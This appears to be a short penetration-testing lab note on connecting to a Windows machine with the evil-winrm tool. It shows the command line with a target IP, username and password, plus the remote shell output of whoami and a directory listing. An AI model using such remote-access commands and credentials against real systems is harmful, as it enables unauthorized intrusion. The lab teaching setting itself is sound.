Evil-WinRM
When creating a PowerShell remoting session via WinRM in a bind shell can cause unexpected bahavior.
To avoid any issues, we should be using evil-winrm to connect to clients win WinRM from our attacking machine. WinRM provides various built-in functions for penetration testing such as pass-the-hash, in-memory loading, and file upload/download. However, we'll only use it to connect to the target system via WinRM to avoid the issues we faced by creating a PowerShell remoting session in our bind shell.
kali@kali:~$ evil-winrm -i 192.168.159.220 -u daveadmin -p $'qwertqwertqwert123!!'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\daveadmin\Documents> whoami
clientwk220\daveadmin
*Evil-WinRM* PS C:\Users\daveadmin\Documents> cd C:\
*Evil-WinRM* PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 8/27/2024 3:22 AM FileZilla
d----- 5/6/2022 10:24 PM PerfLogs
d-r--- 8/27/2024 3:20 AM Program Files
d-r--- 5/7/2022 12:40 AM Program Files (x86)
d----- 7/4/2022 1:00 AM tools
d-r--- 8/21/2024 6:43 AM Users
d----- 8/21/2024 6:47 AM Windows
d----- 6/16/2022 1:17 PM xamppLast updated